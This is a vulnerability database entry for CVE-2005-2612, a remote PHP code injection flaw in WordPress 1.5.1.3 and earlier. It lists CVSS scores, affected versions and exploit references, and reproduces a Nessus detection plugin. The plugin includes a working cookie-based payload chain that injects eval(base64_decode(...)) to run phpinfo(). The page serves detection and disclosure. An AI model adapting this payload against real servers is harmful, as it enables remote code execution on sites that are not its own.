Vulnerabilities > CVE-2005-2612 - Remote Security vulnerability in WordPress

CVSS 7.5 - HIGH

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

PARTIAL

Integrity impact

PARTIAL

Availability impact

PARTIAL

network

low complexity

wordpress

nessus

exploit available

metasploit

NVD

Published: 2005-08-17

Updated: 2008-09-05

Summary

Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cache_lastpostdate[server] cookie.

Vulnerable Configurations

Part	Description	Count
Application	Wordpress Wordpress Wordpress 1.0 Wordpress Wordpress 1.0.1 Wordpress Wordpress 1.0.2 Wordpress Wordpress 1.2 Wordpress Wordpress 1.5 Wordpress Wordpress 1.5.1 Wordpress Wordpress 1.5.1.2 Wordpress Wordpress 1.5.1.3	8

Exploit-Db

description	WordPress cache_lastpostdate Arbitrary Code Execution. CVE-2005-2612. Webapps exploit for php platform
id	EDB-ID:16895
last seen	2016-02-02
modified	2010-07-03
published	2010-07-03
reporter	metasploit
source	https://www.exploit-db.com/download/16895/
title	WordPress cache_lastpostdate - Arbitrary Code Execution

Metasploit

description	This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software. This vulnerability is only present when the PHP 'register_globals' option is enabled (common for hosting providers). All versions of WordPress prior to 1.5.1.3 are affected.
id	MSF:EXPLOIT/UNIX/WEBAPP/WP_LASTPOST_EXEC
last seen	2020-06-01
modified	2017-07-24
published	2015-03-23
references	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2612
reporter	Rapid7
source	https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/wp_lastpost_exec.rb
title	WordPress cache_lastpostdate Arbitrary Code Execution

Nessus

NASL family	CGI abuses
NASL id	WORDPRESS_CACHE_LASTPOSTDATE_CODE_INJECTION.NASL
description	The installed version of WordPress on the remote host will accept and execute arbitrary PHP code passed to the
last seen	2020-06-01
modified	2020-06-02
plugin id	19414
published	2005-08-11
reporter	This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
source	https://www.tenable.com/plugins/nessus/19414
title	WordPress Cookie 'cache_lastpostdate' Parameter PHP Code Injection
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(19414); script_version("1.19"); script_cvs_date("Date: 2018/11/15 20:50:19"); script_cve_id("CVE-2005-2612"); script_bugtraq_id(14533); script_name(english:"WordPress Cookie 'cache_lastpostdate' Parameter PHP Code Injection"); script_summary(english:"Checks for cache_lastpostdate parameter PHP code injection vulnerability in WordPress."); script_set_attribute(attribute:"synopsis", value: "The remote web server contains a PHP script that is affected by a PHP code injection vulnerability."); script_set_attribute(attribute:"description", value: "The installed version of WordPress on the remote host will accept and execute arbitrary PHP code passed to the 'cache_lastpostdate' parameter via cookies if PHP's 'register_globals' setting is enabled."); script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2005/Aug/232"); script_set_attribute(attribute:"solution", value:"Disable PHP's 'register_globals' setting."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"metasploit_name", value:'WordPress cache_lastpostdate Arbitrary Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2005/08/09"); script_set_attribute(attribute:"plugin_publication_date", value:"2005/08/11"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc."); script_dependencies("wordpress_detect.nasl"); script_require_keys("installed_sw/WordPress", "www/PHP"); script_require_ports("Services/www", 80); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("install_func.inc"); app = "WordPress"; get_install_count(app_name:app, exit_if_zero:TRUE); port = get_http_port(default:80, php:TRUE); install = get_single_install( app_name : app, port : port ); dir = install['path']; install_url = build_url(port:port, qs:dir); # Construct an exploit per PoC. # # nb: hardcoding the final value of 'cnv' would save time but not # be as understandable. cmd = "phpinfo();"; code = base64(str:cmd); for (i=0; i<strlen(code); i++) { cnv += string("chr(", ord(code[i]), ")."); } cnv += string("chr(32)"); str = base64(str:"args[0]=eval(base64_decode(" + cnv + ")).die()&"+"args[1]=x"); set_http_cookie(name: "wp_filter[query_vars][0][0][function]", value: "get_lastpostdate"); set_http_cookie(name: "wp_filter[query_vars][0][0][accepted_args]", value: "0"); set_http_cookie(name: "wp_filter[query_vars][0][1][function]", value: "base64_decode"); set_http_cookie(name: "wp_filter[query_vars][0][1][accepted_args]", value: "1"); set_http_cookie(name: "cache_lastpostmodified[server]", value: "//e"); set_http_cookie(name: "cache_lastpostdate[server]", value: str); set_http_cookie(name: "wp_filter[query_vars][1][0][function]", value: "parse_str"); set_http_cookie(name: "wp_filter[query_vars][1][0][accepted_args]", value: "1"); set_http_cookie(name: "wp_filter[query_vars][2][0][function]", value: "get_lastpostmodified"); set_http_cookie(name: "wp_filter[query_vars][2][0][accepted_args]", value: "0"); set_http_cookie(name: "wp_filter[query_vars][3][0][function]", value: "preg_replace"); set_http_cookie(name: "wp_filter[query_vars][3][0][accepted_args]", value: "3"); # Try to exploit one of the flaws to run phpinfo(). r = http_send_recv3(method:"GET", item:dir + "/", port:port, exit_on_fail:TRUE); # There's a problem if it looks like the output of phpinfo(). if ("PHP Version" >< r[2] && "phpinfo()" >< r[2]) { security_warning(port); exit(0); } else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);

Packetstorm

data source	https://packetstormsecurity.com/files/download/131000/wp_lastpost_exec.rb.txt
id	PACKETSTORM:131000
last seen	2016-12-05
published	2015-03-24
reporter	H D Moore
source	https://packetstormsecurity.com/files/131000/WordPress-cache_lastpostdate-Arbitrary-Code-Execution.html
title	WordPress cache_lastpostdate Arbitrary Code Execution

data source	https://packetstormsecurity.com/files/download/82365/php_wordpress_lastpost.rb.txt
id	PACKETSTORM:82365
last seen	2016-12-05
published	2009-10-30
reporter	str0ke
source	https://packetstormsecurity.com/files/82365/WordPress-cache_lastpostdate-Arbitrary-Code-Execution.html
title	WordPress cache_lastpostdate Arbitrary Code Execution

Summary

Vulnerable Configurations

Exploit-Db

Metasploit

Nessus

Packetstorm

References